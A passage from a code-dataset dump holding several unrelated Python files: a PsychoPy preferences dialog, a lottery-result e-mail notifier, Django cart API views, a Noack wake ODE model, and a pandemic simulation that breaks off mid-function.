def addBoolItem(self, section, label=wx.propgrid.PG_LABEL,\n name=wx.propgrid.PG_LABEL, value=False, helpText=\"\"):\n if section not in self.sections.keys():\n self.sections[section] = dict()\n\n self.sections[section].update(\n {name: wx.propgrid.BoolProperty(label, name, value)})\n\n self.helpText[name] = helpText\n\n def addFileItem(self, section, label=wx.propgrid.PG_LABEL,\n name=wx.propgrid.PG_LABEL, value='', helpText=\"\"):\n if section not in self.sections.keys():\n self.sections[section] = []\n\n prop = wx.propgrid.FileProperty(label, name, value)\n self.sections[section].update({name: prop})\n prop.SetAttribute(wx.propgrid.PG_FILE_SHOW_FULL_PATH, True)\n\n self.helpText[name] = helpText\n\n def addDirItem(self, section, label=wx.propgrid.PG_LABEL,\n name=wx.propgrid.PG_LABEL, value='', helpText=\"\"):\n if section not in self.sections.keys():\n self.sections[section] = dict()\n\n self.sections[section].update(\n {name: wx.propgrid.DirProperty(label, name, value)})\n\n self.helpText[name] = helpText\n\n def addIntegerItem(self, section, label=wx.propgrid.PG_LABEL,\n name=wx.propgrid.PG_LABEL, value=0, helpText=\"\"):\n \"\"\"Add an integer property to a category.\n\n Parameters\n ----------\n section : str\n Category name to add the item too.\n label : str\n Label to be displayed in the property grid.\n name : str\n Internal name for the property.\n value : int\n Default value for the property.\n helpText: str\n Help text for this item.\n\n \"\"\"\n if section not in self.sections.keys():\n self.sections[section] = dict()\n\n self.sections[section].update(\n {name: wx.propgrid.IntProperty(label, name, value=int(value))})\n\n self.helpText[name] = helpText\n\n def addEnumItem(self, section, label=wx.propgrid.PG_LABEL,\n name=wx.propgrid.PG_LABEL, labels=(), values=(), value=0,\n helpText=\"\"):\n if section not in self.sections.keys():\n self.sections[section] = dict()\n\n self.sections[section].update({\n name: wx.propgrid.EnumProperty(label, name, labels, values, value)})\n\n self.helpText[name] = helpText\n\n def populateGrid(self):\n \"\"\"Go over pages and add items to the property grid.\"\"\"\n for i in 
range(self.proPrefs.GetPageCount()):\n pagePtr, sections = self.pages[i]\n pagePtr.Clear()\n\n for s in sections:\n _ = pagePtr.Append(pg.PropertyCategory(_localized[s], s))\n for name, prop in self.sections[s].items():\n item = pagePtr.Append(prop)\n\n # set the appropriate control to edit the attribute\n if isinstance(prop, wx.propgrid.IntProperty):\n self.proPrefs.SetPropertyEditor(item, \"SpinCtrl\")\n elif isinstance(prop, wx.propgrid.BoolProperty):\n self.proPrefs.SetPropertyAttribute(\n item, \"UseCheckbox\", True)\n try:\n self.proPrefs.SetPropertyHelpString(\n item, self.helpText[item.GetName()])\n except KeyError:\n pass\n\n self.proPrefs.SetSplitterLeft()\n self.setSelection(0)\n\n def setPrefVal(self, section, name, value):\n \"\"\"Set the value of a preference.\"\"\"\n try:\n self.sections[section][name].SetValue(value)\n return True\n except KeyError:\n return False\n\n def getPrefVal(self, section, name):\n \"\"\"Get the value of a preference.\"\"\"\n try:\n return self.sections[section][name].GetValue()\n except KeyError:\n return None\n\n def OnPrefPageDeselected(self, event):\n event.Skip()\n\n def OnPrefPageSelected(self, event):\n sel = self.lstPrefPages.GetFirstSelected()\n\n if sel >= 0:\n self.proPrefs.SelectPage(sel)\n\n event.Skip()\n\n def OnPropPageChanged(self, event):\n event.Skip()\n\n def OnPropPageChanging(self, event):\n event.Skip()\n\n def isModified(self):\n return self.proPrefs.IsAnyModified()\n\n\nclass PreferencesDlg(wx.Dialog):\n \"\"\"Class for a dialog which edits PsychoPy's preferences.\n \"\"\"\n def __init__(self, app):\n wx.Dialog.__init__(\n self, None, id=wx.ID_ANY,\n title=_translate('PsychoPy Preferences'),\n pos=wx.DefaultPosition, size=wx.Size(800, 600),\n style=wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER)\n\n self.app = app\n self.prefsCfg = self.app.prefs.userPrefsCfg\n self.prefsSpec = self.app.prefs.prefsSpec\n\n self._pages = {} # property grids for each page\n\n self.SetSizeHints(wx.DefaultSize, wx.DefaultSize)\n\n sbMain = wx.BoxSizer(wx.VERTICAL)\n\n self.pnlMain = wx.Panel(\n self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize,\n wx.TAB_TRAVERSAL)\n sbPrefs = wx.BoxSizer(wx.VERTICAL)\n\n self.proPrefs = PrefPropGrid(\n self.pnlMain, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize,\n wx.LB_DEFAULT)\n\n # add property pages to the manager\n self.proPrefs.addPage(\n 'General', 'general', ['general'],\n 'preferences-general')\n self.proPrefs.addPage(\n 'Application', 'app', ['app', 'builder', 'coder'],\n 'preferences-app')\n self.proPrefs.addPage(\n 'Key Bindings', 'keyBindings', ['keyBindings'],\n 'preferences-keyboard')\n self.proPrefs.addPage(\n 'Hardware', 'hardware', ['hardware'], 'preferences-hardware')\n self.proPrefs.addPage(\n 'Connections', 'connections', ['connections'],\n 'preferences-conn')\n self.proPrefs.populateGrid()\n\n sbPrefs.Add(self.proPrefs, 1, wx.EXPAND)\n\n self.stlMain = wx.StaticLine(\n self.pnlMain, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize,\n wx.LI_HORIZONTAL)\n sbPrefs.Add(self.stlMain, 0, wx.EXPAND | wx.ALL, 5)\n\n # dialog controls, have builtin localization\n sdbControls = wx.BoxSizer(wx.HORIZONTAL)\n self.sdbControlsHelp = wx.Button(self.pnlMain, wx.ID_HELP)\n sdbControls.Add(self.sdbControlsHelp, 0,\n wx.LEFT | wx.ALL | wx.ALIGN_CENTER_VERTICAL,\n border=3)\n sdbControls.AddStretchSpacer()\n # Add Okay and Cancel buttons\n self.sdbControlsApply = wx.Button(self.pnlMain, wx.ID_APPLY)\n self.sdbControlsOK = wx.Button(self.pnlMain, wx.ID_OK)\n self.sdbControlsCancel = wx.Button(self.pnlMain, 
wx.ID_CANCEL)\n if sys.platform == \"win32\":\n btns = [self.sdbControlsOK, self.sdbControlsApply, self.sdbControlsCancel]\n else:\n btns = [self.sdbControlsCancel, self.sdbControlsApply, self.sdbControlsOK]\n sdbControls.Add(btns[0], 0,\n wx.ALL | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL,\n border=3)\n sdbControls.Add(btns[1], 0,\n wx.ALL | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL,\n border=3)\n sdbControls.Add(btns[2], 0,\n wx.ALL | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL,\n border=3)\n sbPrefs.Add(sdbControls, flag=wx.ALL | wx.EXPAND, border=3)\n\n self.pnlMain.SetSizer(sbPrefs)\n self.pnlMain.Layout()\n sbPrefs.Fit(self.pnlMain)\n sbMain.Add(self.pnlMain, 1, wx.EXPAND | wx.ALL, 8)\n\n self.SetSizer(sbMain)\n self.Layout()\n\n self.Centre(wx.BOTH)\n\n # Connect Events\n self.sdbControlsApply.Bind(wx.EVT_BUTTON, self.OnApplyClicked)\n self.sdbControlsCancel.Bind(wx.EVT_BUTTON, self.OnCancelClicked)\n self.sdbControlsHelp.Bind(wx.EVT_BUTTON, self.OnHelpClicked)\n self.sdbControlsOK.Bind(wx.EVT_BUTTON, self.OnOKClicked)\n\n # system fonts for font properties\n self.fontList = ['From theme...'] + list(getSystemFonts(fixedWidthOnly=True))\n\n # valid themes\n themePath = self.GetTopLevelParent().app.prefs.paths['themes']\n self.themeList = []\n for file in Path(themePath).glob(\"*.json\"):\n self.themeList.append(file.stem)\n\n # get sound devices for \"audioDevice\" property\n try:\n devnames = sorted(sound.getDevices('output'))\n except (ValueError, OSError, ImportError):\n devnames = []\n\n audioConf = self.prefsCfg['hardware']['audioDevice']\n self.audioDevDefault = audioConf \\\n if type(audioConf) != list else list(audioConf)\n self.audioDevNames = [\n dev.replace('\\r\\n', '') for dev in devnames\n if dev != self.audioDevDefault]\n\n self.populatePrefs()\n\n def __del__(self):\n pass\n\n def populatePrefs(self):\n \"\"\"Populate pages with property items for each preference.\"\"\"\n # clear pages\n for sectionName in self.prefsSpec.keys():\n prefsSection = self.prefsCfg[sectionName]\n specSection = self.prefsSpec[sectionName]\n\n for prefName in specSection:\n if prefName in ['version']: # any other prefs not to show?\n continue\n # allowModuleImports pref is handled by generateSpec.py\n # NB if something is in prefs but not in spec then it won't be\n # shown (removes outdated prefs)\n thisPref = prefsSection[prefName]\n thisSpec = specSection[prefName]\n\n # for keybindings replace Ctrl with Cmd on Mac\n if platform.system() == 'Darwin' and \\\n sectionName == 'keyBindings':\n if thisSpec.startswith('string'):\n thisPref = thisPref.replace('Ctrl+', 'Cmd+')\n\n # can we translate this pref?\n try:\n pLabel = _localized[prefName]\n except Exception:\n pLabel = prefName\n\n # get tooltips from comment lines from the spec, as parsed by\n # configobj\n helpText = ''\n hints = self.prefsSpec[sectionName].comments[prefName] # a list\n if len(hints):\n # use only one comment line, from right above the pref\n hint = hints[-1].lstrip().lstrip('#').lstrip()\n helpText = _translate(hint)\n\n if type(thisPref) == bool:\n # only True or False - use a checkbox\n self.proPrefs.addBoolItem(\n sectionName, pLabel, prefName, thisPref,\n helpText=helpText)\n\n # # properties for fonts, dropdown gives a list of system fonts\n elif prefName in ('codeFont', 'commentFont', 'outputFont'):\n try:\n default = self.fontList.index(thisPref)\n except ValueError:\n default = 0\n labels = [_translate(font) for font in self.fontList]\n self.proPrefs.addEnumItem(\n sectionName,\n pLabel,\n prefName,\n labels=labels,\n values=[i 
for i in range(len(self.fontList))],\n value=default, helpText=helpText)\n elif prefName in ('theme',):\n try:\n default = self.themeList.index(thisPref)\n except ValueError:\n default = self.themeList.index(\"PsychopyLight\")\n self.proPrefs.addEnumItem(\n sectionName,\n pLabel,\n prefName,\n labels=self.themeList,\n values=[i for i in range(len(self.themeList))],\n value=default, helpText=helpText)\n elif prefName == 'locale':\n thisPref = self.app.prefs.app['locale']\n # '' corresponds to system locale\n locales = [''] + self.app.localization.available\n try:\n default = locales.index(thisPref)\n except ValueError:\n # set default locale ''\n default = locales.index('')\n # '' must be appended after other labels are translated\n labels = [_translate('system locale')] + [_localized[i] \n for i in self.app.localization.available]\n self.proPrefs.addEnumItem(\n sectionName,\n pLabel,\n prefName,\n labels=labels,\n values=[i for i in range(len(locales))],\n value=default, helpText=helpText)\n # # single directory\n elif prefName in ('unpackedDemosDir',):\n self.proPrefs.addDirItem(\n sectionName, pLabel, prefName, thisPref,\n helpText=helpText)\n # single file\n elif prefName in ('flac', 'appKeyGoogleCloud',):\n self.proPrefs.addFileItem(\n sectionName, pLabel, prefName, thisPref,\n helpText=helpText)\n # # audio latency mode for the PTB driver\n elif prefName == 'audioLatencyMode':\n # get the labels from above\n labels = []\n for val, labl in audioLatencyLabels.items():\n labels.append(u'{}: {}'.format(val, labl))\n\n # get the options from the config file spec\n vals = thisSpec.replace(\"option(\", \"\").replace(\"'\", \"\")\n # item -1 is 'default=x' from spec\n vals = vals.replace(\", \", \",\").split(',')\n\n try:\n # set the field to the value in the pref\n default = int(thisPref)\n except ValueError:\n try:\n # use first if default not in list\n default = int(vals[-1].strip('()').split('=')[1])\n except (IndexError, TypeError, ValueError):\n # no default\n default = 0\n\n self.proPrefs.addEnumItem(\n sectionName,\n pLabel,\n prefName,\n labels=labels,\n values=[i for i in range(len(labels))],\n value=default, helpText=helpText)\n # # option items are given a dropdown, current value is shown\n # # in the box\n elif thisSpec.startswith('option') or prefName == 'audioDevice':\n if prefName == 'audioDevice':\n options = self.audioDevNames\n try:\n default = self.audioDevNames.index(\n self.audioDevDefault)\n except ValueError:\n default = 0\n else:\n vals = thisSpec.replace(\"option(\", \"\").replace(\"'\", \"\")\n # item -1 is 'default=x' from spec\n vals = vals.replace(\", \", \",\").split(',')\n options = vals[:-1]\n try:\n # set the field to the value in the pref\n default = options.index(thisPref)\n except ValueError:\n try:\n # use first if default not in list\n default = vals[-1].strip('()').split('=')[1]\n except IndexError:\n # no default\n default = 0\n\n labels = [] # display only\n for opt in options:\n try:\n labels.append(_localized[opt])\n except Exception:\n labels.append(opt)\n\n self.proPrefs.addEnumItem(\n sectionName,\n pLabel,\n prefName,\n labels=labels,\n values=[i for i in range(len(labels))],\n value=default, helpText=helpText)\n if prefName == 'builderLayout':\n item = self.proPrefs.sections[sectionName][prefName]\n for i in range(len(item.GetChoices())):\n choice = item.GetChoices()[i]\n icon = icons.ButtonIcon(stem=choice.Text).bitmap\n choice.SetBitmap(icon)\n # # lists are given a property that can edit and reorder items\n elif thisSpec.startswith('list'): 
# list\n self.proPrefs.addStringArrayItem(\n sectionName, pLabel, prefName,\n [str(i) for i in thisPref], helpText)\n # integer items\n elif thisSpec.startswith('integer'): # integer\n self.proPrefs.addIntegerItem(\n sectionName, pLabel, prefName, thisPref, helpText)\n # # all other items just use a string field\n else:\n self.proPrefs.addStringItem(\n sectionName, pLabel, prefName, thisPref, helpText)\n\n self.proPrefs.populateGrid()\n\n def applyPrefs(self):\n \"\"\"Write preferences to the current configuration.\"\"\"\n if not self.proPrefs.isModified():\n return\n\n if platform.system() == 'Darwin':\n re_cmd2ctrl = re.compile(r'^Cmd\\+', re.I)\n\n for sectionName in self.prefsSpec:\n for prefName in self.prefsSpec[sectionName]:\n if prefName in ['version']: # any other prefs not to show?\n continue\n\n thisPref = self.proPrefs.getPrefVal(sectionName, prefName)\n # handle special cases\n if prefName in ('codeFont', 'commentFont', 'outputFont'):\n self.prefsCfg[sectionName][prefName] = \\\n self.fontList[thisPref]\n continue\n if prefName in ('theme',):\n self.app.theme = self.prefsCfg[sectionName][prefName] = self.themeList[thisPref]\n continue\n elif prefName == 'audioDevice':\n self.prefsCfg[sectionName][prefName] = \\\n self.audioDevNames[thisPref]\n continue\n elif prefName == 'locale':\n # '' corresponds to system locale\n locales = [''] + self.app.localization.available\n self.app.prefs.app['locale'] = \\\n locales[thisPref]\n self.prefsCfg[sectionName][prefName] = \\\n locales[thisPref]\n continue\n\n # remove invisible trailing whitespace:\n if hasattr(thisPref, 'strip'):\n thisPref = thisPref.strip()\n # regularize the display format for keybindings\n if sectionName == 'keyBindings':\n thisPref = thisPref.replace(' ', '')\n thisPref = '+'.join([part.capitalize()\n for part in thisPref.split('+')])\n if platform.system() == 'Darwin':\n # key-bindings were displayed as 'Cmd+O', revert to\n # 'Ctrl+O' internally\n thisPref = re_cmd2ctrl.sub('Ctrl+', thisPref)\n self.prefsCfg[sectionName][prefName] = thisPref\n\n # make sure list values are converted back to lists (from str)\n if self.prefsSpec[sectionName][prefName].startswith('list'):\n try:\n # if thisPref is not a null string, do eval() to get a\n # list.\n if thisPref == '' or type(thisPref) == list:\n newVal = thisPref\n else:\n newVal = eval(thisPref)\n except Exception:\n # if eval() failed, show warning dialog and return\n try:\n pLabel = _localized[prefName]\n sLabel = _localized[sectionName]\n except Exception:\n pLabel = prefName\n sLabel = sectionName\n txt = _translate(\n 'Invalid value in \"%(pref)s\" (\"%(section)s\" Tab)')\n msg = txt % {'pref': pLabel, 'section': sLabel}\n title = _translate('Error')\n warnDlg = dialogs.MessageDialog(parent=self,\n message=msg,\n type='Info',\n title=title)\n warnDlg.ShowModal()\n return\n if type(newVal) != list:\n self.prefsCfg[sectionName][prefName] = [newVal]\n else:\n self.prefsCfg[sectionName][prefName] = newVal\n elif self.prefsSpec[sectionName][prefName].startswith('option'):\n vals = self.prefsSpec[sectionName][prefName].replace(\n \"option(\", \"\").replace(\"'\", \"\")\n # item -1 is 'default=x' from spec\n options = vals.replace(\", \", \",\").split(',')[:-1]\n self.prefsCfg[sectionName][prefName] = options[thisPref]\n\n self.app.prefs.saveUserPrefs() # includes a validation\n # maybe then go back and set GUI from prefs again, because validation\n # may have changed vals?\n # > sure, why not? 
 - mdc\n self.populatePrefs()\n\n # Update Builder window if needed\n if self.app.builder:\n self.app.builder.updateAllViews()\n\n # after validation, update the UI\n self.updateFramesUI()\n\n def updateFramesUI(self):\n \"\"\"Update the Coder UI (e.g. fonts, themes, etc.) from prefs.\"\"\"\n for frame in self.app.getAllFrames():\n if frame.frameType == 'builder':\n frame.layoutPanes()\n elif frame.frameType == 'coder':\n # apply settings over document pages\n for ii in range(frame.notebook.GetPageCount()):\n doc = frame.notebook.GetPage(ii)\n doc.theme = prefs.app['theme']\n for ii in range(frame.shelf.GetPageCount()):\n doc = frame.shelf.GetPage(ii)\n doc.theme = prefs.app['theme']\n\n # apply console font, not handled by theme system ATM\n if hasattr(frame, 'shell'):\n frame.shell.setFonts()\n\n def OnApplyClicked(self, event):\n \"\"\"Apply button clicked, this makes changes to the UI without leaving\n the preference dialog. This can be used to see the effects of setting\n changes before closing the dialog.\n\n \"\"\"\n self.applyPrefs() # saves the preferences\n event.Skip()\n\n def OnCancelClicked(self, event):\n event.Skip()\n\n def OnHelpClicked(self, event):\n self.app.followLink(url=self.app.urls[\"prefs\"])\n event.Skip()\n\n def OnOKClicked(self, event):\n \"\"\"Called when OK is clicked. This closes the dialog after applying the\n settings.\n \"\"\"\n self.applyPrefs()\n event.Skip()\n\n\nif __name__ == '__main__':\n from psychopy import preferences\n if parse_version(wx.__version__) < parse_version('2.9'):\n app = wx.PySimpleApp()\n else:\n app = wx.App(False)\n # don't do this normally - use the existing psychopy.prefs instance\n app.prefs = preferences.Preferences()\n dlg = PreferencesDlg(app)\n dlg.ShowModal()\n","repo_name":"psychopy/versions","sub_path":"psychopy/app/preferencesDlg.py","file_name":"preferencesDlg.py","file_ext":"py","file_size_in_byte":37403,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"15166059805","text":"import yagmail\nimport datetime\n\nfrom settings import DEBUG\nfrom utils.search import data_formatter\nfrom _credentials import EMAIL_USER, EMAIL_PASSWORD, EMAIL_HOST, EMAIL_LIST\nfrom utils.init import get_init_vars\n\n# connect to the server\n# username, authorization code, server address\nYAG_SERVER = yagmail.SMTP(user=EMAIL_USER, password=EMAIL_PASSWORD, host=EMAIL_HOST)\n\n# the cycle only changes the content of the e-mail; it does not change how often the application is renewed\nAPPLY_UPDATE_CYCLE = 3\n\n\n# START_DATE = '2020-12' # test: renewal month already reached\n\n\ndef get_previous_month(str1):\n \"\"\"\n Get the month preceding the input date.\n\n :return: int: month\n \"\"\"\n first_day_this_month = datetime.datetime.strptime(str1, '%Y-%m-%d').replace(day=1)\n end_day_last_month = first_day_this_month - datetime.timedelta(days=1)\n return end_day_last_month.month\n\n\ndef process_start_date(start_date):\n \"\"\"\n Shift the month back by one for the calculation.\n\n :param str start_date: year and month of the first lottery application\n :return: datetime: datetime object\n \"\"\"\n date = start_date + '-26'\n result = datetime.datetime.strptime(date, '%Y-%m-%d').replace(month=get_previous_month(date))\n return result\n\n\ndef months(str1, str2):\n \"\"\"\n Month converter: get the number of months between two dates.\n\n :param str str1: %Y-%m-%d\n :param str str2: %Y-%m-%d\n\n :return: int: difference in months\n \"\"\"\n year1 = datetime.datetime.strptime(str1[0:10], \"%Y-%m-%d\").year\n year2 = datetime.datetime.strptime(str2[0:10], \"%Y-%m-%d\").year\n month1 = datetime.datetime.strptime(str1[0:10], \"%Y-%m-%d\").month\n month2 = datetime.datetime.strptime(str2[0:10], \"%Y-%m-%d\").month\n num = (year1 - year2) * 12 + (month1 - month2)\n return num\n\n\ndef send_email(content, result):\n 
\"\"\"\n    Send a different e-mail depending on the result.\n\n    :param str content: common e-mail content\n    :param tuple|bool result: result returned by the winning-number query; False when not selected\n    \"\"\"\n    start_date = get_init_vars('START_DATE')\n    today = datetime.date.today()\n\n    # list of recipients\n    email_to = EMAIL_LIST\n    # e-mail subject\n    email_title = 'License plate lottery report'\n\n    email_content = content\n    extra_content = '\\nNot selected. The application has been renewed; verify the renewal result: https://jtzl.jtj.gz.gov.cn/'\n    extra_content2 = '\\nNot selected. No renewal is needed yet; more queries: https://jtzl.jtj.gz.gov.cn/'\n    bingo_content = '\\nSelected! Check the result on the official site: https://jtzl.jtj.gz.gov.cn/'\n\n    # if not selected\n    if not result:\n        print('Not selected.')\n        # if the renewal month has been reached\n        if months(str(today), str(process_start_date(start_date))) % APPLY_UPDATE_CYCLE == 0:\n            email_content = email_content + extra_content\n        else:\n            print('Renewal month not reached yet')\n            email_content = email_content + extra_content2\n    else:\n        print('Selected!')\n        email_content = email_content + bingo_content\n\n    # attachment list\n    # email_attachments = ['./attachments/report.png', ]\n\n    # send the e-mail\n    # YAG_SERVER.send(email_to, email_title, email_content, email_attachments)\n    YAG_SERVER.send(email_to, email_title, email_content)\n    if DEBUG:\n        print('Winning-result e-mail sent', flush=True)\n\n\nif __name__ == '__main__':\n    formatted, raw = data_formatter()\n    send_email(formatted, raw)\n","repo_name":"PaRaD1SE98/OpenALPL","sub_path":"utils/mail_sender.py","file_name":"mail_sender.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} {"seq_id":"15057835811","text":"from drf_spectacular.utils import extend_schema, extend_schema_view\nfrom drf_spectacular import openapi\n\nfrom rest_framework import viewsets\nfrom rest_framework.filters import OrderingFilter\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom cart.api.paginations import CartAPIListPagination\nfrom cart.api.serializers import (\n    CartSerializer, AddCartItemSerializer,\n    CartItemSerializer, UpdateCartItemSerializer,\n)\nfrom cart.models import Cart, CartItem\n\n\nclass CartViewSet(viewsets.ModelViewSet):\n    \"\"\"Cart view for CRUD\"\"\"\n    queryset = Cart.objects.all().order_by('-created_at').prefetch_related(\n        'items__product', 'items__product__seller_shop',\n        'items__attribute_value__attribute')\n    serializer_class = CartSerializer\n    permission_classes = [IsAuthenticated]\n    pagination_class = CartAPIListPagination\n    filter_backends = (OrderingFilter,)\n\n    http_method_names = ['get', 'post', 'delete']\n\n    def perform_create(self, serializer):\n        serializer.save(user=self.request.user)\n\n\n@extend_schema(\n    parameters=[openapi.OpenApiParameter(\n        'cart_pk', openapi.OpenApiTypes.UUID, openapi.OpenApiParameter.PATH)])\n@extend_schema_view(\n    partial_update=extend_schema(parameters=[\n        openapi.OpenApiParameter('id', openapi.OpenApiTypes.INT,\n                                 openapi.OpenApiParameter.PATH)]),\n    update=extend_schema(parameters=[\n        openapi.OpenApiParameter('id', openapi.OpenApiTypes.INT,\n                                 openapi.OpenApiParameter.PATH)]),\n    retrieve=extend_schema(parameters=[\n        openapi.OpenApiParameter('id', openapi.OpenApiTypes.INT,\n                                 openapi.OpenApiParameter.PATH)]),\n    destroy=extend_schema(parameters=[\n        openapi.OpenApiParameter('id', openapi.OpenApiTypes.INT,\n                                 openapi.OpenApiParameter.PATH)]),\n)\nclass CartItemViewSet(viewsets.ModelViewSet):\n    \"\"\"CartItem view for CRUD\"\"\"\n    permission_classes = [IsAuthenticated]\n\n    http_method_names = ['get', 'post', 'patch', 'delete']\n\n    def get_queryset(self):\n        return CartItem.objects.filter(\n            cart_id=self.kwargs['cart_pk']).prefetch_related(\n            'product', 'product__seller_shop', 'attribute_value',\n            'attribute_value__attribute',\n        
).select_related('attribute_value', 'attribute_value__attribute',\n 'product__seller_shop')\n\n def get_serializer_class(self):\n if self.request.method == 'POST':\n return AddCartItemSerializer\n elif self.request.method == 'PATCH':\n return UpdateCartItemSerializer\n return CartItemSerializer\n\n def get_serializer_context(self):\n return {'cart_id': self.kwargs['cart_pk']}\n","repo_name":"MafanNam/MarketPlace_DRF_API","sub_path":"MarketPlace/cart/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31181596370","text":"\"\"\"Model of cylinder wake, used in Noack (2000)\"\"\"\r\n\r\nfrom typing import Optional\r\n\r\nimport torch\r\nfrom torch import Tensor\r\nimport numpy as np\r\nfrom numpy.typing import NDArray\r\n\r\nfrom .. import Model\r\nfrom ..typing import Vector\r\n\r\n__all__ = [\"NoackModel\"]\r\n\r\n\r\nclass NoackModel(Model):\r\n \"\"\"\r\n 3-state ODE model, normal form of Hopf bifurcation, used in Noack (2000)\r\n \"\"\"\r\n num_states = 3\r\n\r\n def __init__(\r\n self,\r\n mu: float = 0.1,\r\n omega: float = 1.,\r\n A: float = -0.1,\r\n lam: float = 10.\r\n ):\r\n self.mu = mu\r\n self.omega = omega\r\n self.A = A\r\n self.lam = lam\r\n\r\n def rhs(self, x: Vector) -> Vector:\r\n out = np.zeros_like(x)\r\n out[..., 0] = self.mu * x[..., 0] - self.omega * x[..., 1] + self.A * x[..., 0] * x[..., 2]\r\n out[..., 1] = self.omega * x[..., 0] + self.mu * x[..., 1] + self.A * x[..., 1] * x[..., 2]\r\n out[..., 2] = -self.lam * (x[..., 2] - x[..., 0]**2 - x[..., 1]**2)\r\n return out\r\n\r\n def jac(self, x: Vector) -> NDArray[np.float64]:\r\n df1 = [self.mu + self.A * x[2], -self.omega, self.A * x[0]]\r\n df2 = [self.omega, self.mu + self.A * x[2], self.A * x[1]]\r\n df3 = [2 * self.lam * x[0], 2 * self.lam * x[1], -self.lam]\r\n return np.array([df1, df2, df3])\r\n\r\n def adjoint_rhs(self, x: Vector, v: Vector) -> Vector:\r\n return self.jac(x).T @ v\r\n\r\n def rhs_tensor(self, x: Tensor) -> Tensor:\r\n out = torch.zeros_like(x)\r\n out[..., 0] = self.mu * x[..., 0] - self.omega * x[..., 1] + self.A * x[..., 0] * x[..., 2]\r\n out[..., 1] = self.omega * x[..., 0] + self.mu * x[..., 1] + self.A * x[..., 1] * x[..., 2]\r\n out[..., 2] = -self.lam * (x[..., 2] - x[..., 0]**2 - x[..., 1]**2)\r\n return out\r\n\r\n def slow_manifold(self, r):\r\n h0 = r**2\r\n h1 = - 2 * r**2 * (self.A * r**2 + self.mu)\r\n h2 = 4 * r**2 * (3 * self.A**2 * r**4\r\n + 4 * self.A * r**2 * self.mu\r\n + self.mu**2)\r\n h3 = -8 * r**2 * (14 * self.A**3 * r**6\r\n + 24 * self.A**2 * r**4 * self.mu\r\n + 11 * self.A * r**2 * self.mu**2\r\n + self.mu**3)\r\n h4 = 16 * r**2 * (85 * self.A**4 * r**8\r\n + 180 * self.A**3 * r**6 * self.mu\r\n + 120 * self.A**2 * r**4 * self.mu**2\r\n + 26 * self.A * r**2 * self.mu**3\r\n + self.mu**4)\r\n return (h0\r\n + h1 * (1 / self.lam)\r\n + h2 * (1 / self.lam)**2\r\n + h3 * (1 / self.lam)**3\r\n + h4 * (1 / self.lam)**4)\r\n\r\n def random_ic(self, max_amplitude: Optional[float] = 6.) 
-> Vector:\r\n        xmax = max_amplitude\r\n        zmin = -1 * max_amplitude\r\n        zmax = max_amplitude\r\n        x = xmax * (2 * np.random.rand() - 1)\r\n        y = xmax * (2 * np.random.rand() - 1)\r\n        z = zmin + (zmax - zmin) * np.random.rand()\r\n        return np.array((x, y, z))\r\n","repo_name":"grmacchio/romnet_chaos2023","sub_path":"romnet/models/noack.py","file_name":"noack.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} {"seq_id":"21636109846","text":"import numpy as np\nfrom scipy.stats import poisson, skewnorm\n\n\ndef logistic_function(x, a, b, c, d):\n    return (a - b) / (1 + np.exp(d*(x - c))) + b\n\n\ndef logistic_function_growth(x, a, b, c):\n    return a / (1 + (a / c - 1) * np.exp(-a*b*x))\n\n\ndef lognorm(x, mean=20.1, std=11.6, epsilon=1e-3):\n    \"\"\" Log-normal distribution as used for time distribution until death \"\"\"\n    sigma = np.sqrt(np.log((std/mean)**2 + 1))\n    mu = np.log(mean) - sigma**2 / 2\n    x = x.astype(float) + epsilon\n    norm = 1 / x / sigma / np.sqrt(2*np.pi)\n    return norm * np.exp(-(np.log(x)-mu)**2 / 2 / sigma**2)\n\n\nclass IndividuumDrivenPandemie:\n    \"\"\" SimplePandemie \"\"\"\n\n    def __init__(self, n_p=15, attack_rate=0.15, t_contagious=4, t_cured=14, t_death=12, t_confirmed=6, infected_start=10,\n                 lethality=0.01, detection_rate=0.8, nbuffer=10000, total_population=83e6):\n        self.n_p = n_p\n        self.attack_rate = attack_rate\n        self.lethality = lethality\n        self.detection_rate = detection_rate\n        self.t_contagious = t_contagious\n        self.t_cured = t_cured\n        self.t_death = t_death\n        self.t_confirmed = t_confirmed\n        self.total_population = total_population\n\n        self.infected = np.zeros(nbuffer).astype(bool)\n        self.infected[:infected_start] = True\n        self.susceptible = total_population\n        self.infected_total, self.infected_total_confirmed = infected_start, 0\n        self.infected_day, self.infected_day_confirmed = 0, 0\n        self.dead, self.dead_day, self.cured = 0, 0, 0\n        self.days = np.zeros(nbuffer).astype(np.uint)\n        self.days_to_contagious = np.zeros(nbuffer).astype(np.uint)\n        self.days_to_death = -np.ones(nbuffer).astype(int)  # was np.int, which was removed in NumPy 1.24; builtin int is equivalent\n        self.days_to_cure = -np.ones(nbuffer).astype(int)\n        self.days_to_detect = -np.ones(nbuffer).astype(int)\n        self._assign_timing(np.arange(infected_start))\n\n        self.scale = 1\n        self.fraction_buffer = 0\n        self.scale_each = np.ones(nbuffer).astype(int)\n\n    def infect(self):\n        immune = self.cured + np.sum(self.scale_each*self.infected)\n        n_eff = self.n_p * (self.total_population - immune) / self.total_population\n        self.infected_day = np.sum(np.random.poisson(n_eff*self.attack_rate, size=np.sum(self.scale_each*self.is_contagious())))\n        self.infected_total += self.infected_day\n        self.susceptible -= self.infected_day\n        selection = np.cumsum(~self.infected * self.scale_each) <= self.infected_day\n        select_idx = np.where(~self.infected * selection)[0]\n        self.infected[select_idx] = True\n        self.fraction_buffer = len(select_idx) / len(self.infected)\n        self._assign_timing(select_idx)\n\n    def detect(self):\n        self.infected_day_confirmed = np.sum(self.scale_each * self.is_detected())\n        self.infected_total_confirmed += self.infected_day_confirmed\n\n    def cure(self):\n        mask_cured = self.is_cured()\n        self.cured += np.sum(self.scale_each*mask_cured)\n        